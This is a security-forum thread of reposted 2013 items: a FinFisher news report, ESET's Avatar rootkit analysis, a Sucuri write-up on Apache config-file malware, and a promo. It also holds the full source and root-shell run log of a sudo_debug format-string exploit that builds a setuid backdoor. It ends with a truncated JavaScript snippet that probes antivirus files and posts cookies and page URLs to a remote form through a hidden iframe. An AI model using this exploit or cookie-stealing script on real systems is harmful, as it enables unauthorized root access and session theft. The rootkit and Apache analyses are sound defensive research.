Nytro

Hmm, nu ar fi frumos un tutorial cap-coada detaliat?

#include <string> using namespace std; string FOLOSITI_BA_STRING = "OBIECTE";

[h=1]Bullguard Internet Security 2013 – 90 de zile licenta GRATUITA[/h] By Radu FaraVirusi(com) on May 1, 2013 BullGuard, producatorul danez de securitate a lansat versiunea 13 (2013) a produsului BullGuard Internet Security, ce inglobeaza tehnologia antivirus de la BitDefender si firewall de la Outpost. Cu rezultate excelente in teste si cu o protectie foarte buna, il puteti avea acum in mod gratuit timp de 3 luni de zile. Pentru a avea BullGuard Internet Security 2013, versiunea finala cu 3 luni licenta GRATUITA accesati site-ul: https://www.bullguard.com/landing-pages/aff/general50ooff90days.aspx Sursa: Bullguard Internet Security 2013 – 90 de zile licenta GRATUITA

[h=1]With the Rise of Coding, Comes the Rise of Malware[/h] I’m sure you might have read recent articles about how coding is going to be the ultimate skill in the coming years. Seems like this might as well be true, so it’s being pushed with the various online schools being developed (the list is getting exhaustive). With this huge rise of training comes a huge rise of smarter hackers and malware writers. What is it about malware that seems so attractive? Money, fun, damage, etc.? We can get a glimpse of reality when we see the statistics on antivirus vendor websites, some say a million new samples are added weekly. Many of these issues arise out of the violence of society or the outward shame that is inflicted upon other people through the art of cyberbullying, hacking, and other threatening tasks. What’s more is that when we study these aspects, we get a sense that most malware is targeting our wallets, stealing our identities. We need better protection. This is a call to someone who can make better, user friendly operating systems. If you know how to code or are training, please make sure to use it for good. You could in fact become a lot more rich making top security software than becoming a hacker – stealing and risking it all. What’s better for you? Helping or hurting? Good wallet or prison time? Make your choice. Better humanity through an act of good will. Get out there and code for the good! Make a difference! BE THE DIFFERENCE! Don’t be afraid to try new things. Set impossible goals. Shoot yourself into the future of technology and skyscrape the world over with your amazing new security software. Something’s gotta give! And if something doesn’t happen soon, our threatening internet culture could begin to control us and steal our money. We’ll have a very unfair world by then. What if we impose CISPA? That’ll make a lot of people happy but also a lot of people mad. Sursa: With the Rise of Coding, Comes the Rise of Malware | Secure Connexion

[h=1]Spyware used by governments poses as Firefox, and Mozilla is angry[/h][h=2]Mozilla sends cease and desist letter to maker of FinFisher software.[/h] by Jon Brodkin - May 1 2013, 7:41pm GTBDT That's not the real Firefox, either. Nayu Kim Mozilla has sent a cease-and-desist letter to a company that sells spyware allegedly disguised as the Firefox browser to governments. The action follows a report by Citizen Lab, which identifies 36 countries (including the US) hosting command and control servers for FinFisher, a type of surveillance software. Also known as FinSpy, the software is sold by UK-based Gamma International to governments, which use it in criminal investigations and allegedly for spying on dissidents. Mozilla revealed yesterday in its blog that it has sent the cease and desist letter to Gamma "demanding that these illegal practices stop immediately." Gamma's software is "designed to trick people into thinking it's Mozilla Firefox," Mozilla noted. (Mozilla declined to provide a copy of the cease and desist letter to Ars.) The spyware doesn't infect Firefox itself, so a victim's browser isn't at risk. But the spyware "uses our brand and trademarks to lie and mislead as one of its methods for avoiding detection and deletion" and is "used by Gamma’s customers to violate citizens’ human rights and online privacy," Mozilla said. Mozilla continues: Through the work of the Citizen Lab research team, we believe Gamma’s spyware tries to give users the false impression that, as a program installed on their computer or mobile device, it’s related to Mozilla and Firefox, and is thus trustworthy both technically and in its content. This is accomplished in two ways: 1. When a user examines the installed spyware on his/her machine by viewing its properties, Gamma misrepresents its program as “Firefox.exe” and includes the properties associated with Firefox along with a version number and copyright and trademark claims attributed to “Firefox and Mozilla Developers.” 2. For an expert user who examines the underlying code of the installed spyware, Gamma includes verbatim the assembly manifest from Firefox software. The Citizen Lab research team has provided us with samples from the following three instances that demonstrate how this misuse of our brand, trademarks and public trust is a designed feature of Gamma’s spyware products and not unique to a single customer’s deployment: A spyware attack in Bahrain aimed at pro-democracy activists; The recent discovery of Gamma’s spyware apparently in use amidst Malaysia’s upcoming General Elections; and A promotional demo produced by Gamma. Each sample demonstrates the exact same pattern of falsely designating the installed spyware as originating from Mozilla. Gamma’s own brochures and promotional videos tout one of the essential features of its surveillance software is that it can be covertly deployed on the person’s system and remain undetected. The Citizen Lab report provides pictorial evidence of the impersonation: FinFisher doesn't just masquerade as Firefox. The Citizen Lab report says it has also been used to target Malay language speakers by "masquerading as a document discussing Malaysia’s upcoming 2013 General Elections." The countries where Citizen Lab identified FinFisher command-and-control servers are Australia, Austria, Bahrain, Bangladesh, Brunei, Bulgaria, Canada, Czech Republic, Estonia, Ethiopia, Germany, Hungary, India, Indonesia, Japan, Latvia, Lithuania, Macedonia, Malaysia, Mexico, Mongolia, Netherlands, Nigeria, Pakistan, Panama, Qatar, Romania, Serbia, Singapore, South Africa, Turkey, Turkmenistan, United Arab Emirates, United Kingdom, United States, and Vietnam. We've asked Gamma if the company has a response to Mozilla's cease and desist letter but haven't heard back yet. Sursa: http://arstechnica.com/information-technology/2013/05/spyware-used-by-governments-poses-as-firefox-and-mozilla-is-angry/

[h=1]Mysterious Avatar rootkit with API, SDK, and Yahoo Groups for C&C communication[/h] The story of the mysterious malware detected by ESET as Win32/Rootkit.Avatar began in February 2013 when some adverts for this rootkit leaked from Russian cybercrime forums (http://pastebin.com/maPY7SS8). This information produced some heated discussions in the malware research community, however a sample of the Avatar rootkit was not found and published, until now. In this blog we present an in-depth analysis of the Win32/Rootkit.Avatar family, which has some surprising features, and is currently available for sale or rent in the crimeware marketplace. In March ESET detected two droppers with different C&C’s and compilation time stamps: Win32/Rootkit.Avatar uses a driver infection technique twice: the first in the dropper so as to bypass detections by HIPS, and the second in the rootkit driver for surviving after system reboot. The infection technique is restricted in its capability (by code signing policy for kernel-mode modules) and Win32/Rootkit.Avatar works only on x86 systems. We already analyzed in detail, some years ago, how the TDL3 rootkit family also infected system drivers so as to survive after reboot (TDL3: The Rootkit of All Evil?). Before 64-bit versions of Microsoft Windows became so prevalent, operating system tricks for infection using system drivers were really popular in rootkits. But the need for bypassing code signing policy has brought in a new generation of bootkits. More details about the complex bootkit family Win32/Gapz were presented a few weeks ago in our research whitepaper “Mind the Gapz: The most complex bootkit ever analyzed?”. [h=3]The Droppers[/h] The first level dropper implements LZMA decompression for the second level dropper and the malicious driver module. The second level dropper and driver are unique in every instance because the first level dropper generates random names for mutexes/events and enforces modifications directly in the body of the modules. The most interesting trick used in the first level dropper is an anti-debugging technique based on time comparison from the KUSER_SHARED_DATA.InterruptTime system structure. The first level dropper modifies the RtlDispatchException() routine inside the KiUserExceptionDispatcher() body. The next step raises an exception and passes control to the exception-handler: The current time is collected from the KUSER_SHARED_DATA.InterruptTime system structure and compared during the next steps of execution. This non-standard trick can detect emulation or debugging at the first stages of dropper execution. The second level dropper also has checks for known virtual machine software. But these checks are based on standard, already-known tricks. Before the code for VM checking is executed it is decrypted by XOR based encryption using the key “explorer”. At the next steps the operating system version and current user privileges level are checked. The second level dropper uses two ways of escalating privilege: Exploitation of the MS11-080 vulnerability COM Elevation (UAC whitelist) The system infection process by dropper works as presented in the following diagram: The exploit for the MS11-080 vulnerability uses the same exploitation code as a public exploit from Metasploit Framework with minor changes. After a version check for afd.sys the dropper uses the following exploitation code: The next figure presents the code which triggers an AFDJoinLeaf pointer overwrite by sending a specific IOCTL code = 0x000120BB: The most interesting part of the exploit code is the steps taken after exploitation. After a successful exploitation kernel-mode shellcode will be executed for loading the malicious driver. The Avatar rootkit driver is not stored on the hard drive and loads only from a memory region. Here’s the call graph for the routine that loads the malicious driver: Another way to escalate privilege is to use an old technique based on COM Elevation (UAC whitelist). Upon successful escalation, the system directory (%WINDIR%\system32\drivers) is checked, searching for the driver following the infection. After successful infection the GsDriverEntry() routine is modified to execute the following malicious code stub. The modified GsDriverEntry() routine code looks like this: One of the main tasks of the malicious code stub is to attach itself to the second level dropper process and read the Avatar rootkit driver body in memory. The malicious code stub as presented in the following figure: After a successful infection, the modified driver will copy itself to the %TEMP% directory and try to load itself using standard system techniques (Service Control Manager or ZwLoadDriver()). So the Avatar rootkit driver is not stored on the hard drive and will load with the same code used in the method for MS11-080 exploitation for driver execution (see the call graph load_avatar_driver routine above). This method for loading the Avatar rootkit driver by system driver infection is effective for bypassing security software, and loads other kernel-mode modules from a “trusted” (but malicious) system driver. [h=3]Avatar rootkit driver[/h] After successfully loading the Avatar rootkit driver, Avatar executes an algorithm for infecting system drivers so as to survive after reboot. In order to perform its infection, Avatar randomly chooses a driver and checks its name against a blacklist that varies for every Windows versions. The execution flow for an infected system driver looks like this: 1. At the entry point, the following stub code is executed: 2. Then, the GUID_DEVINTERFACE_DISK callback routine is installed into the system driver to loaded the Avatar rootkit driver from the hidden file storage. This is the same technique used by TDL3, TDL4 ( The Evolution of TDL: Conquering x64) and Olmasco (MaxSS/SST). 3. The original code is restored in memory: The Avatar rootkit driver is able to infect several system drivers without changing the original driver’s file size. The Avatar rootkit driver implements an interesting technique to detect the presence of a virtual machine environment. The driver module calls the MmMapIoSpace() routine from the driver to read BIOS data at address 0xF0000 and check for some specific strings: Parallels Software Virtual Machine VirtualBox QEMU BIOS VMware Bochs Additional checks were also found for KVM and Hyper-V based on tricks already known using cpuid instructions. The hidden file system is used to store the user-mode payload module and additional files. All files are encrypted with a custom symmetric cipher. Here’s the call graph for the routine that communicates with the hidden file system: The attributes for files stored in the hidden file system look like this: On the infected machine, additional user-mode and kernel-mode modules can be downloaded and executed that are stored in the hidden file storage. Win32/Rootkit.Avatar does not store malicious components in any standard NTFS storage, except for infected system drivers. The combination of encrypted hidden file storage and infected system drivers make it harder to use typical forensics approaches to investigate an infection by Win32/Rootkit.Avatar. The user-mode payload code injection uses the KeInitializeApc() routine to initialize an APC user-mode object and schedules the execution of this thread into the system process address space. [h=3]Win32/Rootkit.Avatar Payload[/h] The version of the payload from the sample currently researched sample of Win32/Rootkit.Avatar doesn’t have many interesting features. Its main functionalities are: command center communications parsing configuration information read/write into hidden file storage communicating with the rootkit driver installing additional user-mode and kernel-mode modules Of course, this means the initial infection can be the starting point of a variety of malicious activities based on the modules that deployed. In our case the payload component avcmd.dll was injected into svchost.exe system process which started communicating with C&C IP addresses stored in the configuration file. This configuration file has the following structure: name of the botnet command center URLs 1024-bit key for custom encryption algorithm RSA-1024 public key Name of process for the subsequent code injection Examples of decrypted configuration information from two different droppers are shown here: and here: In order to protect communications with the command center, a custom encryption algorithm is used, which output is base64-encoded. All network communications are done from user-mode and use standard WinINet API functions. Win32/Rootkit.Avatar has an additional way of communicating with the C&C if the other methods are not working correctly. The payload tries to search for messages in Yahoo groups using special parameters. Search sequences are based on the following parameter (in our case 17BTN1 and 17NET1): After strings are concatenated, the resulting byte sequence is encrypted using a custom algorithm with a 1024-bit key from the configuration file. BTN1 key = 6mQ98EXP3v7TKMdk704uOUzGqvikuoHt98n8IPp4K19 a3qyZ96LoOc54sb3g9eJVyAs7VmPxQjkkM9R960ev275K24PQ550K1 9fNk8305jRDUTb4cEut4579Zg9i32qU NET1 key = E623J5XKJ9NF4bseM5J2nkwhs1K2766DUOMUDSee3c 7xu06Q9QayV61U4fm5H89ppuNgLt9M5D2XTCLcd0aS3m9CO1aZg9h9 o2zb2EIC437IU3X1P3ec07481E0j2Tdr After encryption the resulting string is encoded with a base64 algorithm, after which all letters are converted to upper case and some symbols are filtered out. An example for botnet BTN1 looks like this: SymFilter(UpperCase(Base64(Encrypt(17BTN1)))) = EZTFDHWP EZTFDHWP is used for the subsequent search request on Yahoo groups. If the search request is successful, the next step is to check the group number and read the group description data. The group description is encrypted with an RSA algorithm and a 1024-bit private key. It is possible to decrypt this data with the public key stored in the configuration file. We suppose this information is to be found in the encrypted message used for returning control for a botnet without an active C&C. After we identified this functionality, we started to search for possible messages on the Yahoo groups web site. Only one group was found with the relevent parameters (11BTN1 = EFS9KHRF). The search request looks like this: Yahoo! Groups: Search Results An encrypted message is present in this group’s description: We were able to decrypt this message using the known RSA-1024 public keys from the configuration information. The key from the BTN1 botnet successfully decrypted this message: dZ8FsJ4z0::http://www.avatarbut.info http://www.avatarsbut.info This information looks similar to C&Cs found in the BTN1 botnet configuration information. The authors of this blog post suspect that this Yahoo group was created to test this communication functionality because it includes the same information already present in the BTN1 configuration file. Avatar’s scheme to maintain botnet control via Yahoo groups messages provide an excellent protection against sinkhole attemps, because information about C&C’s domains is encrypted using an asymmetric algorithm based on the RSA scheme. In the reversing process, researchers can only extract the public key to decrypting messages: this key can’t be used to encrypt new messages to create bogus groups. [h=3]Avatar Runtime Library[/h] Win32/Rootkit.Avatar has a special API for developing additional components without the source code of the Avatar rootkit. This development process is based around the Avatar Runtime Library, a special SDK for developing additional user-mode components which allow communication with the Avatar rootkit driver. The Avatar Runtime Library has the following API functions: aTakeProcessToken() – assign process token from one process to other aExecute() – execute custom module in the context of remote process aLoadDriver() – load driver from hidden file system aLoadFileFromAvatarDisk() – read file from hidden file system aSaveFileOrAttrToAvatarDisk() – write file into hidden file system aSendReport() – send the specific report to C&C The storage structure for payload injection into the user-mode process looks like this: After analysis of the Avatar Runtime Library SDK it seems like a development project by a really skilled system developer or developers. We think that the malware developers worked on it for not less than half year because many kernel-mode techniques need lengthy testing to ensure stability. [h=3]Conclusion[/h] Win32/Rootkit.Avatar is an interesting rootkit family using many interesting techniques for bypassing detection by security software. Rootkits at the level of sophistication of Avatar or Gapz can be used for long term infection by the system executing the attack. Avatar does not store its files in the standard file system and its technique for driver infection makes it harder for typical forensic approaches to be used for successful incident investigation. Avatar also has additional ways to restore botnet control if the command center is taken down or C&C is disrupted for other reasons. For cleaning it’s necessary first to deactivate the Avatar rootkit driver and user-mode payload, and only then is it possible to clean or restore the infected system driver. Anton Cherepanov, Malware Researcher Aleksandr Matrosov, Security Intelligence Team Lead SHA1 hashes for analyzed samples: Dropper1 (BTN1 botnet) – b2b3bb4b7c5a050a583246a8abe5a79d723b8b57 Dropper2 (NET1 botnet) – 93473126a9aa13834413c494ae5f62eec1016fde Sursa: The mysterious Avatar rootkit

1,677,721,600,000,000 ways to encode <script> Screenshot: https://twitter.com/soaj1664ashar/status/329107647087403009/photo/1 Paper: https://t.co/KMgpnS63RD

sudo_debug 1.8.0-1.8.3p1 format string root exploit /* death-star.c sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass by aeon - http://infosecabsurdity.wordpress.com/ This PoC exploits: - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via "nargs" integer overflow - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 "sudo_debug" format string Tested on: - Fedora core 16 verne - glibc 2.14.90.14 release - sudo 1.8.1p2 Notes: - This exploit actually turned out very reliable - You can make a cleaner version of this exploit if you smash sudo_debug function pointer or a libc function pointer so you dont write to disk. I wont be releasing that version References and thanks too: - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/ - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/ - "A Eulogy for Format Strings" http://www.phrack.org/issues.html?issue=67&id=9&mode=txt [aeon@localhost tmp]$ gcc death-star.c -o death-star [aeon@localhost tmp]$ ./death-star [+] Targeting release: 3.1.0-7.fc16.i686.PAE [+] Found vuln glibc version: 2.14.90 [+] Found a vuln sudo version: 1.8.1 [+] Writing backdoor: e.c [+] Compiling backdoor: e [+] Writing SUDO_ASKPASS file: e.sh [+] Press enter when ready... < -------------- REMOVED --------------> AAF@F@F@F@F@' from LD_PRELOAD cannot be preloaded: ignored. %1073825311%21372736 %: settings: = %1073825311%21372736 %: settings: = %1073825311%21372736 %: sudo_mode 1081383169 Sorry, try again. Sorry, try again. Sorry, try again. %20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts %1073886251%21372736 %: policy plugin returns 1081402445 [+] Getting root..! [+] Cleaning system. [+] Launching root shell! sh-4.2# id; uname -a uid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux sh-4.2# head -n1 /etc/shadow root:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0: 99999:7::: sh-4.2# */ #include <sys/resource.h> #include <sys/utsname.h> #include <gnu/libc-version.h> #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <sys/time.h> #include <sys/stat.h> #include <string.h> #include <sys/wait.h> #define OFFSET 65000 #define NUM_THREADS 0 /* files that we create on disk */ #define BACKDOOR "e.c" #define BD_COMPILED "e" #define SUDO_ASKPASS "e.sh" extern char **environ; struct utsname ver; void *kill_sudo(); void *pop_shell(); void *set_env(); int is_glibc_vuln(); int is_sudo_vuln(); int write_backdoor(); /* hardcoded path to sudo */ const char sudo[] = "/usr/bin/sudo\0"; char s_version[20]; /* vuln versions of sudo */ char vuln_sudo_versions[4][20] = { {"1.8.0"}, {"1.8.1"}, {"1.8.2"}, {"1.8.3"} }; /* vuln versions of glibc */ char vuln_glibc_versions[4][20] = { {"2.14.90"}, }; int main(int argc, char *argv[]) { struct rlimit rara; int status; char ready; uname(&ver); printf("[+] Targeting release: %s\n", ver.release); if (is_glibc_vuln()){ if(is_sudo_vuln()){ if (write_backdoor()){ printf("[+] Press enter when ready..."); scanf("%c", &ready); }else{ exit(0); } }else{ exit(0); } }else{ exit(0); } // ulimited stack rara.rlim_max = rara.rlim_cur = -1; setrlimit(RLIMIT_STACK, &rara); pid_t pid; if((pid = fork()) < 0) { printf("[-] An error occurred while forking sudo\n"); return -1; } else if(pid == 0){ set_env(); kill_sudo(); }else{ wait(&status); if (WIFEXITED(status)) { sleep(1); pop_shell(); } } } int is_glibc_vuln(){ int i, returnval = -1; for (i = 0; i < 4; i++){ if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){ printf("[+] Found vuln glibc version: %s\n", gnu_get_libc_version()); returnval = 1; } } return returnval; }; int is_sudo_vuln(){ int i, returnval = -1;; FILE *fp; char path[20]; char sudo_ver_cmd[50]; snprintf(sudo_ver_cmd, sizeof(sudo)+3,"%s -V", sudo); fp = popen(sudo_ver_cmd, "r"); if (fp == NULL) { printf("[-] Failed to get sudo's version\n[-]Exiting.." ); exit(0); } fgets(path, 21, fp); memmove (s_version, path+13,5); for (i = 0; i < 4; i++){ if (strcmp(s_version, vuln_sudo_versions[i]) == 0){ printf("[+] Found a vuln sudo version: %s\n", s_version); returnval = 1; } } return returnval; }; int write_backdoor(){ int returnval = 1; char askpass[100], compile_bd[100]; char bdcode[] = "#include <stdio.h>\r\n" "#include <stdlib.h>\r\n" "int main(int argc, char **argv){\r\n" " printf(\"[+] Getting root..!\\n\");\r\n" " setresuid(0,0,0);\r\n" " printf(\"[+] Cleaning system.\\n\");\r\n" " remove(\"e\"); remove(\"e.c\"); remove(\"e.sh\");\r\n" " printf(\"[+] Launching root shell!\\n\");\r\n" " system(\"/bin/sh\");\r\n" " exit(0);\r\n" "}\r\n"; FILE *fp = fopen(BACKDOOR,"wb"); if (fp == NULL) { printf("[-] Failed to write backdoor on the target, check your permissions\n" ); returnval = -1; }else{ printf("[+] Writing backdoor: %s\n", BACKDOOR); } fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp); memset(compile_bd, 0x00, sizeof(compile_bd)); snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,"/usr/bin/gcc %s -o %s", BACKDOOR, BD_COMPILED); printf("[+] Compiling backdoor: %s\n", BD_COMPILED); fp = popen(compile_bd, "r"); if (fp == NULL) { printf("[-] Failed to compile the backdoor, check the gcc path\n" ); returnval = -1; } fclose(fp); memset(askpass, 0x00, sizeof(askpass)); snprintf(askpass, sizeof(BD_COMPILED)*2+39,"#!/bin/sh\nchown root:root %s\nchmod 4777 %s\n", BD_COMPILED, BD_COMPILED); fp = fopen(SUDO_ASKPASS,"w"); if (fp == NULL) { printf("[-] Failed to write backdoor on the target, check your permissions\n" ); returnval = -1; }else{ printf("[+] Writing SUDO_ASKPASS file: %s\n", SUDO_ASKPASS); } fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp); chmod(SUDO_ASKPASS, 0755); return returnval; }; void *set_env(){ int i = 0; char ld_preload_evar[OFFSET] = "LD_PRELOAD="; char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40}; char sudo_askpass_evar[40]; for (i=0; i<(OFFSET/4); i++){ memcpy(user_details+(i*4), user_details, sizeof(int)); } memmove (ld_preload_evar+11, user_details , sizeof(user_details)); memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar)); snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,"SUDO_ASKPASS=%s", SUDO_ASKPASS); // set our environment putenv(ld_preload_evar); putenv(sudo_askpass_evar); }; void *kill_sudo(){ char fmtstring[] = "%20$08n %*482$ %*2850$ %1073741824$"; char *args[] = { fmtstring, "-D9", "-A", "", NULL}; // trigger the vuln execve(sudo, args, environ); }; void *pop_shell(){ // set our environment unsetenv("LD_PRELOAD"); unsetenv("SUDO_ASKPASS"); char *exploit_args[] = { BD_COMPILED, NULL }; execve(BD_COMPILED, exploit_args, environ); }; Sursa: sudo_debug 1.8.0-1.8.3p1 format string root exploit - CXSecurity.com

Apache Web Server Attacks Continue to Evolve April 29, 2013 by Tony Perez For the past few months we have seen a gradual increase in server-level compromises. In fact, every week it seems we’re handling half a dozen or so and it continues to increase. It’s one of the reasons that I have started including this as a trend in my most recent Website Security presentations. Just last week we talked about some very sneaky hacks that targeted the Apache binaries directly in the place of the modules, contrary to what we had been seeing. Fortunately, the more sophisticated attack are still far and few in between leaving us to deal with rogue modules more often than not. The purpose of this image is to provide a logical representation of the evolution of website attacks. While websites are still the number one distribution mechanism, attackers are making a big effort to improve their attacks by going after server level applications in the place of the website itself, and it’s application (i.e., Custom ASP/PHP, WordPress, Joomla, etc..). The beauty of this is that the attacks becomes platform agnostic, in terms of the platform the end-user is utilizing. We’ve provided guidance in the past on how to identify these things both on CentOS / RedHat and Debian distro’s. That guidance is still the same, but I do want to add some more information around what the attackers are doing to make remediation more of a challenge lately. Two Specific Trends We’ll talk about two specific trends we’re seeing, in addition to the complex attacks targeting Apache binaries and modules. These are not as complex and easier to deploy, but still as dangerous and effective. They also raise concern because to accomplish either you’re looking at a user with administrative privileges, often root. 1. Appending Malware to Outgoing Data via Configuration Files Found by our Analyst Cosmin Strimbu and Senior Analyst Fio Cavallari A few months back, February 19th to be exact, I wrote about some sneaky JavaScript infections in which .htaccess was being used to add, what I like to call, junk in the trunk. But what’s the obvious downside here? Well if the server has many sites on it you have to do it on each one, how annoying is that. Well the attackers agree, so they’ve move their attack one layer down as well. No need to get fancy with Apache modules either, nah, let’s just use the configuration files and do the same thing we were doing in .htaccess. Yes, that’s sarcasm in my tone, and yes, that’s what they’re doing. In a specific instance this is what they did: They modified this configuration file: /etc/httpd/conf.d/php.conf : And they added: <files ~ “\.js$”> AddHandler php5-script .js php_value auto_prepend_file /usr/local/lib/php.lib php_flag display_errors Off </files> Her it’s treating all JavaSscript files as PHP and appending the payload found in this file: /usr/local/lib/php.lib to the outgoing traffic. Then it’s turning off any errors that PHP might throw to avoid detection. The next obvious question is, what’s in that php.lib. Here is what we found in the file: /usr/local/lib/php.lib This is what Google was blacklisting: From the code above you can see that the target of this attack was Internet Explorer. If the right user agent was identified then the attacker was generating a random subdomain on the statistic-online website and sending the user to the malicious payload. Unfortunately we didn’t pull the payload down in time, so hard to say exactly what it was attempting. 2. Disabling Root Changes on Infected Files Yes, there is a way to take away the administrators ability to modify files, any file, on your server. It’s known as making a file immutable and you accomplish this by changing the files attribution, and it’s accomplished using the chattr command. The command is very similar to the attrib command on DOS and Microsoft Windows. A good sign that you might be dealing with this is if you’re logged into your server as root, or with a user that has administrator permissions, and when you make a change you see: W10: Warning: Changing a read-only file Or if you try to save and you see: /etc/httpd/conf.d/ssl.conf” E212: Can’t open file for writing This is a good time to make use of the list command, but append the attr option so that it looks like this: # lsattr filename - in my example it’d be # lsattr /etc/httpd/conf.d/ssl.conf You’re likely to see something like this: —-ia——- /etc/httpd/conf.d/ssl.conf The i and a attributes both mean something unique. The i set it to immutable so no-one can mess with it, but the a option makes it so that you can append to an existing file but you can’t modify existing data. You should make note however that the only user that can modify these attributes is your root user, so this is a good sign that it’s likely compromised. Regardless, if this is the case, you can, thankfully, remove the restriction by doing: # chattr -ia /etc/httpd/conf.d/ssl.conf In this case the - will remove the restriction while the + will add it. Once that is done you should see this: # lsattr /etc/httpd/conf.d/ssl.conf ————- /etc/httpd/conf.d/ssl.conf Now you’re back in business and removing things like this: LoadModule uni_config_module modules/mod/mod_uni_config.so I can’t remember the last time we found the LoadModule call being referenced in the httpd.conf, this means that they’re loading it via other configuration files so it’s a good thing to crawl through all your configuration files in /etc/httpd/conf.d as they are being loaded when Apache runs. A quick an easy way to do this: # grep -ri “LoadModule” /etc/ I’d start in your /etc/ directory, it’s the default location for most distros, but in some instances you might need to look elsewhere, just depends on your distribution and configuration. Don’t forget to remove the module as well, not just the LoadModule call: # rm -rf /etc/httpd/modules/mod_uni_config.so And reset the immutable attribute on your configuration files so that automated attacks are stopped in their tracks, but remove the append attribute. # chattr +i /etc/httpd/conf.d/ssl.conf Do remember that both these changes were made as a user with administrative privileges. This means that removing or making these changes is just half the battle. If you cannot definitively identify the vector, it might be time to reimage the box or migrate to a new one. It will not do you much good if you remove it but leave everything else in place, they’ll likely continue to gain access. The frist thing I’d recommend is purging all accounts that have access. I’d then ensure that I’m not longer using passwords to authenticate and start adding a few layers of defense. What Does This Tell Us? We’re in for a treat, I’m perhaps most concerned about attack on the Apache binaries more so than anything as it’s so difficult to detect and fix, it does tell us that we’re in for some interesting times. We know that websites are high value targets for attackers and that they make up for 90% of the unknown malware to traditional AV’s. One very common trend in all these attacks is how they’re all being used to distributed payloads created by the BlackHole Exploit Kit. This shows a level of sophistication in that segment of attackers that we are not seeing with other groups. Sursa: Apache Web Server Attacks Continue to Evolve | Sucuri Blog

window.justforfunnum = 25; var justforfunpath=new Array("<?php return;?>==","avira==\\\\127.0.0.1\\c$\\Program Files\\Avira\\AntiVir Desktop\\avsda.dll","avira==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\avipbb.sys","bitdefender_2013==\\\\127.0.0.1\\c$\\Program Files\\Bitdefender\\Bitdefender 2013 BETA\\BdProvider.dll","bitdefender_2013==\\\\127.0.0.1\\c$\\Program Files\\Bitdefender\\Bitdefender 2013 BETA\\Active Virus Control\\avc3_000_001\\avcuf32.dll","mcafee_enterprise==\\\\127.0.0.1\\c$\\Program Files\\McAfee\\VirusScan Enterprise\\RES0402\\McShield.dll","mcafee_enterprise==\\\\127.0.0.1\\c$\\Program Files\\Common Files\\McAfee\\SystemCore\\mytilus3.dll","mcafee_enterprise==\\\\127.0.0.1\\c$\\Program Files\\Common Files\\McAfee\\SystemCore\\mytilus3_worker.dll","avg2012==\\\\127.0.0.1\\c$\\Program Files\\AVG Secure Search\\13.2.0.4\\AVG Secure Search_toolbar.dll","avg2012==\\\\127.0.0.1\\c$\\Program Files\\Common Files\\AVG Secure Search\\DNTInstaller\\13.2.0\\avgdttbx.dll","avg2012==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\avgtpx86.sys","eset_nod32==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\eamon.sys","Dr.Web==\\\\127.0.0.1\\c$\\Program Files\\DrWeb\\drwebsp.dll","Mse==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\MpFilter.sys","sophos==\\\\127.0.0.1\\c$\\PROGRA~1\\Sophos\\SOPHOS~1\\SOPHOS~1.DLL","f-secure2011==\\\\127.0.0.1\\c$\\program files\\f-secure\\scanner-interface\\fsgkiapi.dll","f-secure2011==\\\\127.0.0.1\\c$\\Program Files\\F-Secure\\FSPS\\program\\FSLSP.DLL","f-secure2011==\\\\127.0.0.1\\c$\\program files\\f-secure\\hips\\fshook32.dll","Kaspersky_2012==\\\\127.0.0.1\\c$\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\klwtblc.dll","Kaspersky_2012==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\klif.sys","Kaspersky_2013==\\\\127.0.0.1\\c$\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\remote_eka_prague_loader.dll","Kaspersky_2013==\\\\127.0.0.1\\c$\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\klwtblc.dll","Kaspersky_2013==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\kneps.sys","Kaspersky_2013==\\\\127.0.0.1\\c$\\WINDOWS\\system32\\drivers\\klflt.sys",''); window.justforfunres = new Array(); function execjs(url) { var jsme = document.createElement('script'); var page = document.getElementsByTagName('head').item(0); jsme.src = url+'?'+Math.random(); page.appendChild(jsme); } function include(formaction,vul) { var ref = document.referrer; var urlx = location.href; var temp="Url:"+urlx+"xxooxxooReferer:"+ref+"xxooxxooCookies:"+escape(document.cookie); if (document.all) { iframe_tag = document.createElement("<iframe name=postformdata style=display:none>"); document.getElementsByTagName('head')[0].appendChild(iframe_tag); var form_tag = document.createElement("form"); form_tag.target="postformdata"; form_tag.method="POST"; form_tag.action = formaction; document.getElementsByTagName('head')[0].appendChild(form_tag); var i = document.createElement("input"); i.type = "hidden"; i.value = temp; i.name = "ck"; var j = document.createElement("input"); j.type = "hidden"; j.value = vul; j.name = "vul"; form_tag.appendChild(i); form_tag.appendChild(j); form_tag.submit(); } else { iframe_tag = document.createElement('iframe'); iframe_tag.setAttribute("name", "postformdata"); iframe_tag.setAttribute("width", "0"); 